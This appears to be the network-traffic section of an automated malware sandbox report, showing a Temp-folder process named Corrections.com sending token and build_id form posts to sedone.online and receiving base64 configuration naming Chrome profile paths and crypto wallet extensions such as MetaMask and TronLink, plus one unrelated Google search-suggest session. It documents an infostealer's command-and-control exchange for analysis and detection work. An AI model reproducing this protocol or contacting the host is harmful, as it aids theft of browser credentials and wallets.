                                                                                                                                                                                                                                                  Data Ascii: 3a1|1|1|1|7610a19a50993d198235bacee5f60466|1|0|1|1|0|50000|00


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  3192.168.2.449779116.203.12.1144437808C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-12-17 16:29:11 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----6XLX4OZU37QQQQ1DJM7Q
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                  Host: sedone.online
                                                                                                                                                                                                                                                  Content-Length: 331
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  2024-12-17 16:29:11 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 36 58 4c 58 34 4f 5a 55 33 37 51 51 51 51 31 44 4a 4d 37 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 31 30 61 31 39 61 35 30 39 39 33 64 31 39 38 32 33 35 62 61 63 65 65 35 66 36 30 34 36 36 0d 0a 2d 2d 2d 2d 2d 2d 36 58 4c 58 34 4f 5a 55 33 37 51 51 51 51 31 44 4a 4d 37 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 36 58 4c 58 34 4f 5a 55 33 37 51 51 51 51 31 44 4a 4d 37 51 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                  Data Ascii: ------6XLX4OZU37QQQQ1DJM7QContent-Disposition: form-data; name="token"7610a19a50993d198235bacee5f60466------6XLX4OZU37QQQQ1DJM7QContent-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------6XLX4OZU37QQQQ1DJM7QCont
                                                                                                                                                                                                                                                  2024-12-17 16:29:11 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Date: Tue, 17 Dec 2024 16:29:11 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  2024-12-17 16:29:11 UTC2192INData Raw: 38 38 34 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4d 36 58 46 42 79 62 32 64 79 59 57 30 67 52 6d 6c 73 5a 58 4e 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 42 63 48 42 73 61 57 4e 68 64 47 6c 76 62 6c 78 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 6c 54 45 39 44 51 55 78 42 55 46 42 45 51 56 52 42 4a 56 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46
                                                                                                                                                                                                                                                  Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  4192.168.2.449785116.203.12.1144437808C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-12-17 16:29:13 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----TR9Z5PZC2VAIMYCT00RI
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                  Host: sedone.online
                                                                                                                                                                                                                                                  Content-Length: 331
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  2024-12-17 16:29:13 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 54 52 39 5a 35 50 5a 43 32 56 41 49 4d 59 43 54 30 30 52 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 31 30 61 31 39 61 35 30 39 39 33 64 31 39 38 32 33 35 62 61 63 65 65 35 66 36 30 34 36 36 0d 0a 2d 2d 2d 2d 2d 2d 54 52 39 5a 35 50 5a 43 32 56 41 49 4d 59 43 54 30 30 52 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 54 52 39 5a 35 50 5a 43 32 56 41 49 4d 59 43 54 30 30 52 49 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                  Data Ascii: ------TR9Z5PZC2VAIMYCT00RIContent-Disposition: form-data; name="token"7610a19a50993d198235bacee5f60466------TR9Z5PZC2VAIMYCT00RIContent-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------TR9Z5PZC2VAIMYCT00RICont
                                                                                                                                                                                                                                                  2024-12-17 16:29:14 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Date: Tue, 17 Dec 2024 16:29:14 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  2024-12-17 16:29:14 UTC5837INData Raw: 31 36 63 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                                                                                                                                                                                  Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  5192.168.2.449791116.203.12.1144437808C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-12-17 16:29:15 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----8YMO8G479H4E37Q1NGD2
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                  Host: sedone.online
                                                                                                                                                                                                                                                  Content-Length: 332
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  2024-12-17 16:29:15 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 38 59 4d 4f 38 47 34 37 39 48 34 45 33 37 51 31 4e 47 44 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 31 30 61 31 39 61 35 30 39 39 33 64 31 39 38 32 33 35 62 61 63 65 65 35 66 36 30 34 36 36 0d 0a 2d 2d 2d 2d 2d 2d 38 59 4d 4f 38 47 34 37 39 48 34 45 33 37 51 31 4e 47 44 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 38 59 4d 4f 38 47 34 37 39 48 34 45 33 37 51 31 4e 47 44 32 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                  Data Ascii: ------8YMO8G479H4E37Q1NGD2Content-Disposition: form-data; name="token"7610a19a50993d198235bacee5f60466------8YMO8G479H4E37Q1NGD2Content-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------8YMO8G479H4E37Q1NGD2Cont
                                                                                                                                                                                                                                                  2024-12-17 16:29:16 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Date: Tue, 17 Dec 2024 16:29:16 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  2024-12-17 16:29:16 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  6192.168.2.449797116.203.12.1144437808C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-12-17 16:29:18 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----Z58QQQ16FUSJMYM7YUKX
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                  Host: sedone.online
                                                                                                                                                                                                                                                  Content-Length: 6625
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  2024-12-17 16:29:18 UTC6625OUTData Raw: 2d 2d 2d 2d 2d 2d 5a 35 38 51 51 51 31 36 46 55 53 4a 4d 59 4d 37 59 55 4b 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 31 30 61 31 39 61 35 30 39 39 33 64 31 39 38 32 33 35 62 61 63 65 65 35 66 36 30 34 36 36 0d 0a 2d 2d 2d 2d 2d 2d 5a 35 38 51 51 51 31 36 46 55 53 4a 4d 59 4d 37 59 55 4b 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 5a 35 38 51 51 51 31 36 46 55 53 4a 4d 59 4d 37 59 55 4b 58 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                  Data Ascii: ------Z58QQQ16FUSJMYM7YUKXContent-Disposition: form-data; name="token"7610a19a50993d198235bacee5f60466------Z58QQQ16FUSJMYM7YUKXContent-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------Z58QQQ16FUSJMYM7YUKXCont
                                                                                                                                                                                                                                                  2024-12-17 16:29:19 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Date: Tue, 17 Dec 2024 16:29:18 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  2024-12-17 16:29:19 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 2ok0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  7192.168.2.449798116.203.12.1144437808C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-12-17 16:29:19 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----4OP8G4WLNYCBIM7Q9HLX
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                  Host: sedone.online
                                                                                                                                                                                                                                                  Content-Length: 489
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  2024-12-17 16:29:19 UTC489OUTData Raw: 2d 2d 2d 2d 2d 2d 34 4f 50 38 47 34 57 4c 4e 59 43 42 49 4d 37 51 39 48 4c 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 31 30 61 31 39 61 35 30 39 39 33 64 31 39 38 32 33 35 62 61 63 65 65 35 66 36 30 34 36 36 0d 0a 2d 2d 2d 2d 2d 2d 34 4f 50 38 47 34 57 4c 4e 59 43 42 49 4d 37 51 39 48 4c 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 34 4f 50 38 47 34 57 4c 4e 59 43 42 49 4d 37 51 39 48 4c 58 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                  Data Ascii: ------4OP8G4WLNYCBIM7Q9HLXContent-Disposition: form-data; name="token"7610a19a50993d198235bacee5f60466------4OP8G4WLNYCBIM7Q9HLXContent-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------4OP8G4WLNYCBIM7Q9HLXCont
                                                                                                                                                                                                                                                  2024-12-17 16:29:20 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Date: Tue, 17 Dec 2024 16:29:19 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  2024-12-17 16:29:20 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 2ok0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  8192.168.2.449814142.250.181.1004434092C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-12-17 16:29:23 UTC607OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  2024-12-17 16:29:23 UTC1266INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Tue, 17 Dec 2024 16:29:23 GMT
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  Expires: -1
                                                                                                                                                                                                                                                  Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                  Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-kvqW2_nhT9rgHB4qphr9-Q' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                  Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                  Permissions-Policy: unload=()
                                                                                                                                                                                                                                                  Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                  Server: gws
                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  2024-12-17 16:29:23 UTC124INData Raw: 37 34 62 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 6a 61 6d 65 73 20 67 75 6e 6e 20 73 75 70 65 72 6d 61 6e 20 74 65 61 73 65 72 22 2c 22 66 65 64 65 72 61 6c 20 72 65 73 65 72 76 65 20 69 6e 74 65 72 65 73 74 20 72 61 74 65 20 63 75 74 73 22 2c 22 69 6e 64 69 61 6e 61 20 6a 6f 6e 65 73 20 67 72 65 61 74 20 63 69 72 63 6c 65 22 2c 22 70 67 61 20 74 6f 75 72 20 73 68 6f 77
                                                                                                                                                                                                                                                  Data Ascii: 74b)]}'["",["james gunn superman teaser","federal reserve interest rate cuts","indiana user great circle","pga tour show
                                                                                                                                                                                                                                                  2024-12-17 16:29:23 UTC1390INData Raw: 64 6f 77 6e 22 2c 22 74 6f 72 6e 61 64 6f 20 77 61 72 6e 69 6e 67 20 63 61 6c 69 66 6f 72 6e 69 61 20 73 63 6f 74 74 73 20 76 61 6c 6c 65 79 22 2c 22 6e 76 69 64 69 61 20 73 74 6f 63 6b 22 2c 22 6d 6f 76 69 65 20 74 72 61 69 6c 65 72 73 22 2c 22 73 70 61 63 65 78 20 66 61 6c 63 6f 6e 20 39 20 72 6f 63 6b 65 74 20 6c 61 75 6e 63 68 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32 56 68 63 6d 4e 6f 5a 58 4d 5c 75 30 30 33 64 22 2c 22
                                                                                                                                                                                                                                                  Data Ascii: down","tornado warning california scotts valley","nvidia stock","movie trailers","spacex falcon 9 rocket launch"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","
                                                                                                                                                                                                                                                  2024-12-17 16:29:23 UTC360INData Raw: 62 6a 4e 53 55 31 55 35 54 33 46 42 61 30 6c 76 53 33 4d 31 53 6d 4a 54 54 6b 34 33 51 58 49 7a 54 6a 64 70 4b 30 34 77 62 46 41 77 4e 32 77 35 52 6b 70 54 57 6d 4a 52 62 57 35 70 62 6d 73 78 54 32 68 71 52 57 63 33 4f 47 64 43 65 56 46 43 4e 57 56 33 4e 45 5a 31 4d 32 4a 45 61 6b 68 35 55 32 4a 6b 53 6c 68 68 65 6e 42 30 65 44 56 4b 56 47 78 4f 62 30 46 4e 52 6b 4a 53 63 58 70 6b 55 56 5a 73 55 30 31 7a 59 6e 46 44 5a 45 70 74 61 54 4e 5a 62 7a 42 6a 64 48 5a 52 4e 6d 31 47 4d 56 42 6b 61 55 35 4f 65 6c 6b 7a 64 56 46 77 54 6e 4e 6b 62 45 70 52 56 69 74 68 57 6b 35 54 63 53 74 61 57 6d 35 4e 4d 44 46 58 53 6c 70 5a 4d 6e 56 76 59 56 42 69 4e 46 64 53 56 30 68 6d 56 56 46 31 5a 31 63 34 65 48 5a 69 65 54 68 58 64 45 78 59 62 56 59 78 5a 47 46 70 63 44 4a
                                                                                                                                                                                                                                                  Data Ascii: bjNSU1U5T3FBa0lvS3M1SmJTTk43QXIzTjdpK04wbFAwN2w5RkpTWmJRbW5pbmsxT2hqRWc3OGdCeVFCNWV3NEZ1M2JEakh5U2JkSlhhenB0eDVKVGxOb0FNRkJScXpkUVZsU01zYnFDZEptaTNZbzBjdHZRNm1GMVBkaU5OelkzdVFwTnNkbEpRVithWk5TcStaWm5NMDFXSlpZMnVvYVBiNFdSV0hmVVF1Z1c4eHZieThXdExYbVYxZGFpcDJ
                                                                                                                                                                                                                                                  2024-12-17 16:29:23 UTC90INData Raw: 35 34 0d 0a 6c 76 51 57 52 6e 63 46 4e 45 62 32 35 50 4e 45 74 50 52 6b 6c 58 63 57 38 31 64 30 63 7a 4d 57 6c 78 64 32 74 69 64 46 6c 6b 63 6b 56 49 55 32 4a 58 64 47 4a 72 54 6e 6c 43 59 6b 51 79 56 7a 6c 43 4e 57 70 49 62 57 4e 4f 56 6c 63 78 53 33 6c 78 62 46 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 54lvQWRncFNEb25PNEtPRklXcW81d0czMWlxd2tidFlkckVIU2JXdGJrTnlCYkQyVzlCNWpIbWNOVlcxS3lxbF
                                                                                                                                                                                                                                                  2024-12-17 16:29:23 UTC938INData Raw: 33 61 33 0d 0a 4a 32 54 56 70 4c 62 44 4a 5a 4d 6d 45 32 4b 32 35 4f 65 47 45 76 53 54 56 47 4c 31 68 47 61 7a 4a 6b 4d 48 6c 78 65 6b 39 72 63 58 46 78 4e 6e 4a 72 52 47 74 6d 51 58 5a 6d 4d 31 41 33 51 54 52 6d 63 44 56 6f 56 56 46 53 65 6b 74 79 53 33 4e 70 61 47 64 48 52 6d 70 5a 4e 44 4e 4f 65 46 64 42 4d 31 6f 7a 55 33 56 35 63 46 52 36 53 32 74 6c 62 47 56 75 53 58 46 71 53 6d 46 58 62 33 4a 4e 65 48 70 50 5a 46 70 74 59 57 38 79 5a 6b 56 74 53 6b 45 33 63 31 68 69 4f 48 5a 54 56 30 4a 4d 53 47 68 35 4d 6b 78 47 52 6c 5a 47 51 32 39 76 56 6c 5a 47 5a 30 46 4d 51 55 52 43 5a 33 68 54 51 55 46 77 4d 57 6c 58 62 6d 68 74 53 32 31 68 52 30 39 52 63 6d 5a 54 57 46 56 48 4d 6b 31 48 61 6e 42 54 4d 6d 38 77 4d 45 39 79 4d 7a 4a 34 5a 6b 4a 6e 65 47 78 44
